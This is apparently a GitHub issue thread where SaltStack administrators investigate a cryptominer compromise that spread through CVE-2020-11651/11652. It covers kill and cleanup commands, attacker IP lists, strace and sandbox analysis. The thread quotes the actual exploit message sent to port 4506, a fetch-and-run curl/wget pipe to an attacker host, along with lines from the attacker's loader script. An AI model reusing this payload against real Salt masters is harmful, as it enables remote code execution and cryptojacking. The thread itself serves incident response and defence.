Description
My all servers with salt-minion installed,An unknown program suddenly ran today,
He's /tmp/salt-minions
[root@yunwei ~]# top
top - 10:06:44 up 511 days, 18:39, 3 users, load average: 2.01, 2.02, 1.91
Tasks: 193 total, 1 running, 192 sleeping, 0 stopped, 0 zombie
Cpu(s): 7.2%us, 18.3%sy, 0.0%ni, 74.1%id, 0.4%wa, 0.0%hi, 0.0%si, 0.0%st
Mem: 8060948k total, 7502768k used, 558180k free, 76316k buffers
Swap: 4194300k total, 437368k used, 3756932k free, 188012k cached
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
2280 root 20 0 56.0g 541m 1588 S 101.1 6.9 345886:48 tp_core
27061 root 20 0 2797m 1848 1000 S 99.1 0.0 36:02.75 salt-minions
[root@yunwei ~]# ps -ef |grep 27061 | grep -v grep
root 27061 1 89 09:26 ? 00:36:37 /tmp/salt-minions
sal-minion version 2018.3.2
sys:CentOS release 6.5 (Final)
I have the same.
salt-minion -V
Salt Version:
Salt: 3000.1
Dependency Versions:
cffi: Not Installed
cherrypy: Not Installed
dateutil: 2.7.3
docker-py: Not Installed
gitdb: Not Installed
gitpython: Not Installed
Jinja2: 2.10
libgit2: Not Installed
M2Crypto: Not Installed
Mako: Not Installed
msgpack-pure: Not Installed
msgpack-python: 0.5.6
mysql-python: Not Installed
pycparser: Not Installed
pycrypto: 2.6.1
pycryptodome: Not Installed
pygit2: Not Installed
Python: 3.7.3 (default, Dec 20 2019, 18:57:59)
python-gnupg: Not Installed
PyYAML: 3.13
PyZMQ: 17.1.2
smmap: Not Installed
timelib: Not Installed
Tornado: 4.5.3
ZMQ: 4.3.1
System Versions:
dist: debian 10.3
locale: UTF-8
machine: x86_64
release: 4.19.0-8-cloud-amd64
system: Linux
version: debian 10.3
lsb_release -a
No LSB modules are available.
Distributor ID: Debian
Description: Debian GNU/Linux 10 (buster)
Release: 10
Codename: buster
Gents, this is an attack.
Check your firewalls. We've had all firewalls disabled on more than 20 systems. Still working to find out more about the issue.
Appears to be related to CVE-2020-11651 and CVE-2020-11652. A backdoor was also installed via the exploit to /var/tmp/salt-store.
Additional context for those not in the loop can be seen here:
https://gbhackers.com/saltstack-salt/
F
Maybe it is CVE-2020-11651 and CVE-2020-11652,Because my salt-master has access across the extranet
Entire system is being taken down by this can anyone tell us the immediate fix please?
sudo salt -v '*' cmd.run 'ps aux | grep -e "/var/tmp/salt-store\|salt-minions" | grep -v grep | tr -s " " | cut -d " " -f 2 | xargs kill -9'
This did at least something for me
I've also managed to strace the "salt-minoins" and got some IP, I guess it attackers host
clock_gettime(CLOCK_REALTIME, {1588474770, 745058278}) = 0
clock_gettime(CLOCK_REALTIME, {1588474770, 745079132}) = 0
epoll_wait(6, {}, 1024, 162) = 0
clock_gettime(CLOCK_MONOTONIC, {28866503, 976451307}) = 0
clock_gettime(CLOCK_MONOTONIC, {28866503, 976489118}) = 0
clock_gettime(CLOCK_MONOTONIC, {28866503, 976516591}) = 0
futex(0x9c4384, FUTEX_WAKE_OP_PRIVATE, 1, 1, 0x9c4380, {FUTEX_OP_SET, 0, FUTEX_OP_CMP_GT, 1}) = 1
futex(0x9c4340, FUTEX_WAKE_PRIVATE, 1) = 1
epoll_wait(6, {{EPOLLIN, {u32=9, u64=9}}}, 1024, 338) = 1
clock_gettime(CLOCK_MONOTONIC, {28866503, 976644019}) = 0
read(9, "1\0\0\0\0\0\0\0", 1024) = 8
clock_gettime(CLOCK_MONOTONIC, {28866503, 976722525}) = 0
socket(PF_INET, SOCK_STREAM|SOCK_CLOEXEC|SOCK_NONBLOCK, IPPROTO_IP) = 89
setsockopt(89, SOL_TCP, TCP_NODELAY, [1], 4) = 0
setsockopt(89, SOL_SOCKET, SO_KEEPALIVE, [1], 4) = 0
setsockopt(89, SOL_TCP, TCP_KEEPIDLE, [60], 4) = 0
connect(89, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("193.33.87.231")}, 16) = -1 EINPROGRESS (Operation now in progress)
clock_gettime(CLOCK_MONOTONIC, {28866503, 976922034}) = 0
epoll_ctl(6, EPOLL_CTL_ADD, 89, {EPOLLOUT, {u32=89, u64=89}}) = 0
epoll_wait(6, {}, 1024, 338) = 0
clock_gettime(CLOCK_MONOTONIC, {28866504, 315460999}) = 0
kill -9 $(pgrep salt-minions)
kill -9 $(pgrep salt-store)
193.33.87.231
Russian IP
I saw an example out there that was an AWS server (52.8.126.80)
A scan revealed over 6,000 instances of this service exposed to the public Internet. Getting all of these installs updated may prove a challenge as we expect that not all have been configured to automatically update the salt software packages.
To aid in detecting attacks against vulnerable salt masters, the following information is provided.
Exploitation of the authentication vulnerabilities will result in the ASCII strings "_prep_auth_info" or "_send_pub" appearing in data sent to the request server port (default 4506). These strings should not appear in normal, benign, traffic.
Published messages to minions are called "jobs" and will be saved on the master (default path /var/cache/salt/master/jobs/). These saved jobs can be audited for malicious content or job ids ("jids") that look out of the ordinary. Lack of suspicious jobs should not be interpreted as absence of exploitation however.
Seems like it's better to stop salt-masters for a while
Stopping salt masters does not stop the processes from running. Also, can we expect that the exploiters have had root access to every minion?
Been affected :( . Done the following: Stopped all Salt Masters, and run the following:
kill -9 $(pgrep salt-minion)
kill -9 $(pgrep salt-minions)
kill -9 $(pgrep salt-store)
rm /tmp/salt-minions
rm /var/tmp/salt-store
Not sure if this is enough at the moment
Important references:
Disconnect them from the internet ASAP, perform the necessary updates. There are also backports for older versions of Salt:
YOU MUST UPDATE YOUR MASTER(S) IMMEDIATELY
Important references:
- https://github.com/saltstack/community/blob/master/doc/Community-Message.pdf
- https://docs.saltstack.com/en/latest/topics/releases/3000.2.html
- https://docs.saltstack.com/en/latest/topics/releases/2019.2.4.html
- https://labs.f-secure.com/advisories/saltstack-authorization-bypass
- https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/
Disconnect them from the internet ASAP, perform the necessary updates. There are also backports for older versions of Salt:
- "There are also now official 2016.x and 2017.x patches provided by SaltStack via the same location as the other patches."
Seems the attack started a couple of hours ago. I would add:
We got the same issue and we followed the above which remediated it. Thank you all for giving the solution.
In our experience, we had one job that was executed that did the following on each server according to the logs:
<83>¦returnÚláFirewall stopped and disabled on system startup
kernel.nmi_watchdog = 0
userdel: user 'akay' does not exist
userdel: user 'vfinder' does not exist
chattr: No such file or directory while trying to stat /root/.ssh/authorized_keys
grep: Trailing backslash
grep: write error: Broken pipe
log_rot: no process found
chattr: No such file or directory while trying to stat /etc/ld.so.preload
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.1': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.2': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.3': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.1': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.2': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.3': No such file or directory
rm: cannot remove '/var/tmp/lib': No such file or directory
rm: cannot remove '/var/tmp/.lib': No such file or directory
chattr: No such file or directory while trying to stat /tmp/lok
chmod: cannot access '/tmp/lok': No such file or directory
sh: 484: docker: not found
sh: 485: docker: not found
sh: 486: docker: not found
sh: 487: docker: not found
sh: 488: docker: not found
sh: 489: docker: not found
sh: 490: docker: not found
sh: 491: docker: not found
sh: 492: docker: not found
sh: 493: docker: not found
sh: 494: docker: not found
sh: 495: docker: not found
sh: 496: docker: not found
sh: 497: docker: not found
sh: 498: docker: not found
sh: 499: docker: not found
sh: 500: docker: not found
sh: 501: docker: not found
sh: 502: docker: not found
sh: 503: docker: not found
sh: 504: docker: not found
sh: 505: docker: not found
sh: 506: setenforce: not found
apparmor.service is not a native service, redirecting to systemd-sysv-install
Executing /lib/systemd/systemd-sysv-install disable apparmor
insserv: warning: current start runlevel(s) (empty) of script `apparmor' overrides LSB defaults (S).
insserv: warning: current stop runlevel(s) (S) of script `apparmor' overrides LSB defaults (empty).
Failed to stop aliyun.service.service: Unit aliyun.service.service not loaded.
Failed to execute operation: No such file or directory
P NOT EXISTS
md5sum: /var/tmp/salt-store: No such file or directory
salt-store wrong
--2020-05-02 20:10:27-- https://bitbucket.org/samk12dd/git/raw/master/salt-store
Resolving bitbucket.org (bitbucket.org)... 18.205.93.1, 18.205.93.2, 18.205.93.0, ...
Connecting to bitbucket.org (bitbucket.org)|18.205.93.1|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16687104 (16M) [application/octet-stream]
Saving to: '/var/tmp/salt-store'
2020-05-02 20:10:40 (1.27 MB/s) - '/var/tmp/salt-store' saved [16687104/16687104]
8ec3385e20d6d9a88bc95831783beaeb
salt-store OK§retcode^@§successÃ
salt-minions -> https://github.com/xmrig/xmrig
same things in my servers.
Any compromised minion is toast I'm guessing. /tmp/salt-minions is just compiled xmrig? Anyone have any hints for cleanup?
[root@xiaopgg_2 ~]# /tmp/salt-minions -h
Usage: xmrig [OPTIONS]
Network:
-o, --url=URL URL of mining server
-a, --algo=ALGO mining algorithm https://xmrig.com/docs/algorithms
We are investigating salt-store
(loader: hxxp://217.12.210.192/salt-store
, hxxps://bitbucket.org/samk12dd/git/raw/master/salt-store
) and you should do the same, not the salt-minions
(miner)!
VT salt-store: https://www.virustotal.com/gui/file/9fbb49edad10ad9d096b548e801c39c47b74190e8745f680d3e3bcd9b456aafc/detection
What we know right now
/var/spool/cron/root
193.33.87.231
should be blocked on all server via iptables/firewalldredis_brH9
, main.redisBrute
)minions
kill -9 $(pgrep salt-minions)
kill -9 $(pgrep salt-store)
rm -f /tmp/salt-minions
rm -f /var/tmp/salt-store
sed -i '/kernel.nmi_watchdog/d' /etc/sysctl.conf
systemctl restart firewalld || /etc/init.d/iptables restart
master
yum update salt-master
systemctl restart salt-master
We have the same problem, the program shut down all the services, include nginx 、redis
It enables hugepages.
Probably wise to change your passwords if you've been logging into root.
Here's what my salt-store tried to run:
/usr/sbin/sh -c pkill -f salt-minions
/usr/sbin/sh -c chmod +x /tmp/salt-minions
/usr/sbin/sh -c /tmp/salt-minions &
(The last 2 lines execute in a loop until it can detect the miner is running)
Method of detection: spun up a docker container, replaced /bin/sh
with a script which logs all run commands to a tmpfile.
Dockerfile:
FROM archlinux
ADD salt-store .
ADD hello.sh .
RUN chmod +x salt-store
RUN chmod +x hello.sh
RUN cp /bin/sh /bin/shh
CMD /bin/bash
hello.sh:
#!/bin/bash
read -r line
/bin/echo "$0 $*" >> /log.txt
/bin/bash -c "$*"
Build container, spin up, run "mv /hello.sh /bin/sh", run "./salt-store", wait 2 minutes, cat log.txt
salt-store also auto-downloads the salt-minions binary to /tmp/salt-minions. Not a shell script, uses golang built-in.
It also stopped and disabled Docker services.
Spent few moments thinking Docker ports stopped working because of disabled firewall rules, and was trying to configure iptables forwarding before noticing Docker was disabled. :facepalm:
Yes. Stops Confluence, webservers, aliyun, redis, docker, basically anything CPU intensive so he can steal all your resources for his miner :)
Also creates/modifies /etc/selinux/config to:
SELINUX=disabled
Modifies /root/.wget-hsts as well
Modifies root's crontab /var/spool/cron/crontabs/root (in my case with no suspicious entries)
I've reported the bitbucket repo to atlassian as a malware distribution point.
Also found file /etc/salt/minion.d/_schedule.conf
schedule:
__mine_interval: {enabled: true, function: mine.update, jid_include: true, maxrunning: 2,
minutes: 60, return_job: false, run_on_start: true}
But i found this file is generated by salt minion, so nevemind.
I got hit a few hours ago and they hit a host with snoopy running if anyone is interested in what commands they're running in their payload. Looks like they also knock out /var/log/syslog, set kernel.nmi_watchdog=0 in /etc/sysctl.conf, and disable apparmor in systemd.
Edit: Still going through the lines, but it looks like they also knock out ufw and flush all the chains
@justinimn you are a godsend. Thank you!
Update: Was able to search some of the strings from the snoopy output.
Here:
https://xorl.wordpress.com/2017/12/13/the-kworker-linux-cryptominer-malware/
@taigrr My pleasure
Funny, they even clean the system of any other miners if running. :smile:
@Avasz Hey can't leave any coins on the table right lol
Except they just delete the wallets instead of trying to take them. /shrug
loader: hxxp://217.12.210.192/salt-store
Seems to be Ukrainian IP, related to itldc
It is not pingable any more, and I can not curl -s 217.12.210.192/sa.sh
So I suppose that at least one point of attack was disabled (by itldc or someone else)
Checked ping from 191 different IPs, no ping
We are investigating
salt-store
(loader:hxxp://217.12.210.192/salt-store
,hxxps://bitbucket.org/samk12dd/git/raw/master/salt-store
) and you should do the same, not thesalt-minions
(miner)!
VT salt-store: https://www.virustotal.com/gui/file/9fbb49edad10ad9d096b548e801c39c47b74190e8745f680d3e3bcd9b456aafc/detectionWhat we know right now
- (!) Firewall rules cleaned up, stopped and disabled
- (!) Make changes in the
/var/spool/cron/root
- Hardcoded IP
193.33.87.231
should be blocked on all server via iptables/firewalld- NMI watchdog is disabled via sysctl
- AppArmor is disabled, also
- Nginx is stopped
- Trying to hack Redis (
redis_brH9
,main.redisBrute
)- Loader contains https://ironnet.com/blog/malware-analysis-nspps-a-go-rat-backdoor/ https://gyazo.com/d5b8e2df6838ab452fc8a51374dd3a86
minions
kill -9 $(pgrep salt-minions) kill -9 $(pgrep salt-store) rm -f /tmp/salt-minions rm -f /var/tmp/salt-store sed -i '/kernel.nmi_watchdog/d' /etc/sysctl.conf systemctl restart firewalld || /etc/init.d/iptables restart
master
yum update salt-master systemctl restart salt-master
@aTastyCookie did you get a copy of 217.12.210.192/sa.sh ? we need that to dig its behavior.
Bunch more IPs:
144.217.129.111
185.17.123.206
185.221.153.85
185.255.178.195
91.215.152.69
salt-store IPs I see mentioned:
252.5.4.32
5.4.52.5
4.62.5.4
72.5.4.82
0.0.0.0
2.5.4.102
5.4.112.5
127.0.0.1
47.65.90.240
185.61.7.8
67.205.161.58
104.248.3.165
1.4.1.1
1.4.1.1
1.4.3.1
1.4.4.1
1.4.6.1
1.4.7.1
1.4.8.1
1.4.9.1
1.4.9.1
1.4.10.1
1.4.11.1
1.4.12.1
1.4.12.1
1.4.13.1
1.4.14.1
1.4.14.1
1.4.14.2
1.4.14.2
1.2.1.1
1.2.2.1
1.2.3.1
1.2.3.1
1.2.4.1
1.2.4.1
1.2.6.1
1.2.8.1
1.1.1.1
1.1.1.1
1.1.1.1
1.1.2.1
1.1.3.1
1.1.3.1
1.2.1.1
1.2.2.1
1.2.2.1
(Note: This was generated by strings salt-store | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}"
)
104.248.4.162
107.174.47.156
107.174.47.181
108.174.197.76
121.42.151.137
140.82.52.87
144.217.45.45
158.69.133.18
176.31.6.16
181.214.87.241
185.181.10.234
185.193.127.115
185.71.65.238
188.209.49.54
192.236.161.6
200.68.17.196
217.12.210.192
3.215.110.66
45.76.122.92
46.243.253.15
51.15.56.161
51.38.191.178
51.38.203.146
83.220.169.247
88.99.242.92
89.35.39.78
In case these help. These are from sa.sh
file.
$WGET $DIR/salt-store http://217.12.210.192/salt-store
crontab -l | sed '/185.181.10.234/d' | crontab -
crontab -l | sed '/3.215.110.66.one/d' | crontab -
netstat -anp | grep 140.82.52.87 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 %
netstat -anp | grep 185.71.65.238 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep '108.174.197.76' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep '176.31.6.16' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep '192.236.161.6' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep '46.243.253.15' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep '88.99.242.92' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
pgrep -f 181.214.87.241 | xargs -I % kill -9 %
pgrep -f 188.209.49.54 | xargs -I % kill -9 %
pgrep -f 200.68.17.196 | xargs -I % kill -9 %
pkill -f 121.42.151.137
pkill -f 185.193.127.115
ps aux | grep -v grep | grep '104.248.4.162' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '107.174.47.156' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '107.174.47.181' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '144.217.45.45' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "158.69.133.18:8220" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '176.31.6.16' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '45.76.122.92' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '51.15.56.161' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '51.38.191.178' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '51.38.203.146' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '83.220.169.247' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '89.35.39.78' | awk '{print $2}' | xargs -I % kill -9 %
Contacted the abuse team for 193.33.87.231
(by chance we're hosted by the same company that owns this AS), it's one of their clients and they're looking into it.
My bet it's a hacked VPS.
Can we see who add this repo?
https://bitbucket.org/samk12dd/git/src/master/
@onewesong I contacted atlassian over 2 hours ago. Will report back once they respond. So far, nothing.
Edit: 9 hours later and still no response.
Edit: 13 hours. Sheesh. Guess I won't hear back until Monday.
I can confirm this is being delivered via the new cve exploiting exposed port 4506 on salt masters.
{
"enc": "clear",
"load": {
"arg": [
"(curl -s 217.12.210.192/sa.sh||wget -q -O- 217.12.210.192/sa.sh)|sh"
],
"cmd": "_send_pub",
"fun": "cmd.run",
"jid": "15884696218711903731",
"kwargs": {
"show_jid": false,
"show_timeout": true
},
"ret": "",
"tgt": "*",
"tgt_type": "glob",
"user": "root"
}
}
This thread has been amazing - my monitoring was going crazy; Slack messages, text messages, emails - it was screaming for help. Thanks to you guys, i've been successful in #1. upgrading my salt-master (I was on a 2018 version); and #2: identifying that it's the same issue that I was plagued with. So thank you very much for the information thus far.
I'm nowhere near the sysadmin that you guys are, but I have 17 servers that were affected. If there's anything I can dig up to help the investigation just let me know and I'd be more than happy to pitch in with data.
Additionally, I'm in AWS with everything. Right now 4505 and 4506 are both open to the world; I'm guessing despite upgrading salt, these ports should be closed to the world; Is it only the minions that need access to them or is there something else that needs access too?
Now i'm off to figure out how to upgrade the minions on the servers.
@jblac Don't trust a compromised system. Reinstall is the only safe thing.
You should even consider that any data had chance to leak from server.
I've made backports for the CVE patches, see https://github.com/rossengeorgiev/salt-security-backports. Salt masters should not be accessible via the public internet. Or at the very least should be heavily firewalled.
I’m a little concerned about some of the victim blaming such as “use a firewall” since the official documentation specifically states to open up the firewall for the TCP ports. Sure, experienced admins will know to wall up your garden, but novice admins do not have such experiences yet.
FWIW
2406 write(7, "GET /h HTTP/1.1\r\nHost: 185.221.153.85\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36\r\nArch: amd64\r\nCores: 1\r\nMem: 489\r\nOs: linux\r\nOsname: ubuntu\r\nOsversion: 14.04\r\nRoot: false\r\nUuid: 2e10f8e9-aa42-4223-59b1-9c1038862c25\r\nVersion: 30\r\nAccept-Encoding: gzip\r\n\r\n", 341) = 341
salt-store tries to push some meta data about the machine to it's C2 server (or some minion of it)
/E: and it uses some kind of jsonrpc to send keepalives
/var/cache/salt/master/jobs# ls -ltrR
Will show which minions it connected to.
This will be useful for cleanup.
Updated salt-master
but miner jobs are still spawning on minions even after killing/deleting them. Any hint?
There is likely some sort of persistence established. The best course is to restore a backup prior to breach, or rebuild the server. If that's not possible, shutdown the salt-minion, and try to find what is relaunching the miners:
iftop
), then apply a firewall rule to block traffic to/from that IP./var/spool/cron
, and /etc/cron.{d,daily,weekly,monthly}/
/usr/lib/systemd/system
and /etc/systemd/system
/etc/init.d
/root/.bashrc
, /root/.bash_profile
grep
to search for files containing it across the entire file systemThere are many other possibilities, and you can never be 100% certain you've scrubbed all of the malicious code.
Switching to salt-ssh
and removing salt-master
and salt-minions
also helps greatly :)
FYI, after disabling minion service and rebooting, no more miners thing spawned. On my side, nothing left after a reboot (as long minion is disabled of course). I'll re-enable the service on a test machine and see if patched master solved it.
It's not a proof, however a heurstics: I diffed the filesystem (incluing bootloader) of my sandbox VM before and after i ran salt-store
and I haven't found any persistence mechanism.
This is the complete list of modified files by the malware:
/run/lock/linux.lock
/tmp/.ICEd-unix
/tmp/.ICEd-unix/346542842
/tmp/.ICEd-unix/uuid
/tmp/salt-minions
/var/tmp/.ICEd-unix
Probably noteworthy: I killed / restarted the process itself and subprocesses to see if the binary behaves different. However salt-store
always just restarted his minor child process.
Yet, they may use a VM detection and run different code branches on different environments. The sysctl patch was done by the sa.sh
bootstrap script, so it's not listed here. Since the sa.sh
can be seen as sourcecode in this thread i only focused on analyzing salt-store
.
I haven't seen any persistence mechisms in sa.sh
either.
I would still double check everything, if rebuild or backup restore is not possible, as this miner may not be the only attack.
/var/cache/salt/master/jobs# ls -ltrR
Will show which minions it connected to.
This will be useful for cleanup.
I did a grep -r confluence .
on this directory to check which clients did execute the sa.sh
script (this may be a false positive on confluence servers, yet not all servers run confluence i guess). For active salt-minions i'd run salt-key -L
.
I would still double check everything, if rebuild or backup restore is not possible, as this miner may not be the only attack.
If your master is not a minion as well, the master itself is not compromised by this vulnerability. Additionally, all commands executed on minions are still logged on the master by default. So it should be possible to track all actions which have been made by the salt vulnerability itself. This obviously excludes modifications by any programs salt has side-loaded on the machine which are most likely run under root privileges (like sa.sh
/ salt-minion
).
I've been digging through the salt-miner-snoopy-log.txt that was posted above:
Elements in that log file & loader script found elsewhere that may provide some additional insight into the underlying behavior:
https://tolisec.com/yarn-botnet/
https://zero.bs/how-an-botnet-infected-confluence-server-looks-like.html
https://xn--blgg-hra.no/2017/04/covert-channels-hiding-shell-scripts-in-png-files/
https://gist.github.com/OmarTrigui/8ba857c6a9a91724a7eb0cfdd040f50d
https://s.tencent.com/research/report/975.html
Updated
salt-master
but miner jobs are still spawning on minions even after killing/deleting them. Any hint?
Don't forget to restart the salt master as well.
For some reasons, in one of my instances killing all salt-minions
& salt-store
process as well as deleting those files doesn't seem to be working.
salt-minions
process starts within about 2 minutes of killing and deleting them.
Checked cron, init, systemd, bashrc, rc.local, nothing found. Still digging around, will update if anything worthy is found.
This is something I was worried about. The salt-store binary is capable of self-updating. It's possible there is additional persistence behavior now that wasn't there last night even. Can you md5 your binary?
Upfate: confirmed! The bitbucket repo force-pushed a new binary to the repo. It's now called "salt-storer" instead of salt-store. This was done 3 hours ago.
I ran the below on each of the servers as suggested above and then rebooted each box. (About 240 of them!) I am not seeing any more spawning after this.
kill -9 $(pgrep salt-minions)
kill -9 $(pgrep salt-store)
rm -f /tmp/salt-minions
rm -f /var/tmp/salt-store
sed -i '/kernel.nmi_watchdog/d' /etc/sysctl.conf
systemctl restart firewalld || /etc/init.d/iptables restart
Before I did that, I turned off my salt-master. What is the safest way to turn the master back on and patch it? It is a VPS that has internet connectivity. What is the best procedure to patch the master?
For some reasons, in one of my instances killing all
salt-minions
&salt-store
process as well as deleting those files doesn't seem to be working.
salt-minions
process starts within about 2 minutes of killing and deleting them.Checked cron, init, systemd, bashrc, rc.local, nothing found. Still digging around, will update if anything worthy is found.
Not much but this:
root@myserver:/tmp/.ICEd-unix/bak# cat 328909204 && echo
25391
root@myserver:/tmp/.ICEd-unix/bak# ps ax | grep 25391
25391 ? Ssl 4:51 /tmp/salt-minions
25759 pts/5 S+ 0:00 grep 25391
root@myserver:/tmp/.ICEd-unix/bak#
So what's happening here is that, if I kill the salt-minions
service, after about 2 minutes a file gets written inside .ICEd-unix
folder. The content of that file would be a number which is PID of parent salt-minions
, and that file gets deleted as soon as salt-minion
process starts.
I had to loop cp
to get that file copied from .ICEd-unix
folder to .ICEd-unix/bak
, so please ignore that bak/
.
For some reasons, in one of my instances killing all
salt-minions
&salt-store
process as well as deleting those files doesn't seem to be working.
salt-minions
process starts within about 2 minutes of killing and deleting them.
Checked cron, init, systemd, bashrc, rc.local, nothing found. Still digging around, will update if anything worthy is found.Update 1
Not much but this:
root@myserver:/tmp/.ICEd-unix/bak# cat 328909204 && echo 25391 root@myserver:/tmp/.ICEd-unix/bak# ps ax | grep 25391 25391 ? Ssl 4:51 /tmp/salt-minions 25759 pts/5 S+ 0:00 grep 25391 root@myserver:/tmp/.ICEd-unix/bak#
So what's happening here is that, if I kill the
salt-minions
service, after about 2 minutes a file gets written inside.ICEd-unix
folder. The content of that file would be a number which is PID of parentsalt-minions
, and that file gets deleted as soon assalt-minion
process starts.
I had to loopcp
to get that file copied from.ICEd-unix
folder to.ICEd-unix/bak
, so please ignore thatbak/
.
Did you update and restart your salt-master? Could it be kicking it off again?
Updates to the malware continue to go out. This thread may now contain outdated hints and help.
Oh yes. It's happening after updating and restarting salt-master.
```root@00:/var/cache/salt# salt --version
salt 3000.2
root@00:/var/cache/salt# systemctl status salt-master
● salt-master.service - The Salt Master Server
Loaded: loaded (/lib/systemd/system/salt-master.service; enabled; vendor preset: enabled)
Active: active (running) since Sun 2020-05-03 21:10:31 +0545; 1h 11min ago
Docs: man:salt-master(1)
file:///usr/share/doc/salt/html/contents.html
https://docs.saltstack.com/en/latest/contents.html
Main PID: 19783 (salt-master)
Tasks: 34 (limit: 4915)
Memory: 279.8M
CGroup: /system.slice/salt-master.service
├─19783 /usr/bin/python3 /usr/bin/salt-master
------ truncated -----------
May 03 21:10:31 00 systemd[1]: Stopped The Salt Master Server.
May 03 21:10:31 00 systemd[1]: Starting The Salt Master Server...
May 03 21:10:31 00 systemd[1]: Started The Salt Master Server.
```
And it's happening even after I have salt-master stopped. Tested just now, double checked by stopping salt-master.
@Avasz Can you tree your processes and see what the parent process is? And what's the md5sum of your salt-store binary? I can run it in a container and see what other files it might touch.
@taigrr
Parent process: /sbin/init :open_mouth:
I don't have /var/tmp/salt-store binary anymore..
@Avasz this thing has morphed quite a bit. I'm starting to think a GitHub issue isn't the best way to troubleshoot anymore.
I have both binaries:
md5sum /tmp/salt-minions
a28ded80d7ab5c69d6ccde4602eef861 /tmp/salt-minions
md5sum /var/tmp/salt-store
8ec3385e20d6d9a88bc95831783beaeb /var/tmp/salt-store
I was also seeing just one of my machines established a persistence for salt-minions without salt-store(r).
I wrote a quick bash while-lsof to catch it, and a randomly-named process was writing out the file.
I just rebooted that machine. If it re-establishes, I'm going to write a quick script to send a SIGSTOP (and/or hook gdb) when lsof picks it up again.
@astronouth7303 What is the name of that random process? Is it "vXrSv"?
It is always that and salt-minions
in my case.
salt-mini 4692 root 1u REG 8,1 4 667325 104066568
vXrSv 7619 root 6u REG 8,1 4 667325 104066568
@taigrr yeah.. this issue doesn't seem to be a good place to discuss anymore. Any other alternative communication channel? Telegram? Slack? :)
@astronouth7303 What is the name of that random process? Is it "vXrSv"?
It is always that andsalt-minions
in my case.
Nope, mine was XrqMv
It doesn't seem to be coming back after reboot.
SaltStack has a slack, which seems like the obvious choice?
@astronouth7303 What is the name of that random process? Is it "vXrSv"?
It is always that andsalt-minions
in my case.Nope, mine was
XrqMv
It doesn't seem to be coming back after reboot.
SaltStack has a slack, which seems like the obvious choice?
Just rebooted and it stopped coming back.
Anybody want to join the slack, https://saltstackcommunity.herokuapp.com/
I've created a dedicated channel (salt-store-miner-public). Send username to be added.
@Avasz Be careful. I don't believe it's gone.
@taigrr Would like to join the conversation.
This whole "don't have your salt master exposed to the internet" thing has me annoyed.
The whole point of salt is to manage boxes all over the place.
I manage around 500 machines. Most of them are behind the firewalls of incompetent admins who have spent hours in the past trying to set up port forwards when salt-minion crashed so I could access the box again.
I'm about to test binding salt-master to localhost and salt-minion to localhost and then setting up spiped to wrap the traffic...
Anybody want to join the slack, https://saltstackcommunity.herokuapp.com/invite
I've created a dedicated channel (salt-store-miner). Send username to be added.@Avasz Be careful. I don't believe it's gone.
i would like to be added
I'd also be happy to be invited, thanks.
Anybody want to join the slack, https://saltstackcommunity.herokuapp.com/invite
I've created a dedicated channel (salt-store-miner). Send username to be added.@Avasz Be careful. I don't believe it's gone.
Me too please
Anybody want to join the slack, https://saltstackcommunity.herokuapp.com/invite
I've created a dedicated channel (salt-store-miner). Send username to be added.
@Avasz Be careful. I don't believe it's gone.Me too please
Me too plaese
I'd also be happy to be invited, thanks.
Username on slack? Can't find you, @nbuchwitz
Guys, please give me your slack names. You must already be a part of the slack group I posted the link above. Having trouble finding some of you. You can also dm me through slack (Tai Groot) to prevent from cluttering this issue.
I used these commands to remove the binaries and stop the processes on all hosts. The second one is from @opiumfor, above.
salt -v '*' cmd.run 'rm /var/tmp/salt-store && rm /tmp/salt-minions'
salt -v '*' cmd.run 'ps aux | grep -e "/var/tmp/salt-store\|salt-minions" | grep -v grep | tr -s " " | cut -d " " -f 2 | xargs kill -9'
This whole "don't have your salt master exposed to the internet" thing has me annoyed.
The whole point of salt is to manage boxes all over the place.
I manage around 500 machines. Most of them are behind the firewalls of incompetent admins who have spent hours in the past trying to set up port forwards when salt-minion crashed so I could access the box again.
I do agree with this.
I also have a similar use case. 1000+ devices all in various places, various networks. VPN & controlled access to port 4505 & 4506 not possible at all. Salt was the perfect tool .
